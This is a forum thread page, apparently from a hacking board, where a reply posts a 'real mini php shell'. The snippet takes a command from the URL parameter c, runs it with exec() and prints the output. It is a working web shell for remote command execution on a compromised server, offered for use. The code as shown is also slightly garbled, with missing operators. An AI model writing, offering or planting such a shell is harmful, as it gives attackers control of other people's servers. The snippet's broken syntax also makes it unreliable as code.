Login Register






The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.
Thread Rating:
  • 0 Vote(s) - 0 Average
Thread Closed 


Mini PHP Shell 27.9 V2 Released filter_list
Author
Message
RE: Mini PHP Shell 27.9 V2 Released #15
lol here is a real mini php shell
PHP Code:
<?php
$cmd 
$_GET["c"];
$output null;
exec($cmd$output);
echo 
"<pre>" var_export($outputTRUE) . "</pre>\\n";
?>






Messages In This Thread
Mini PHP Shell 27.9 V2 Released - by MaLw4Re-Al - 08-05-2011, 02:15 PM



Users browsing this thread: 1 Guest(s)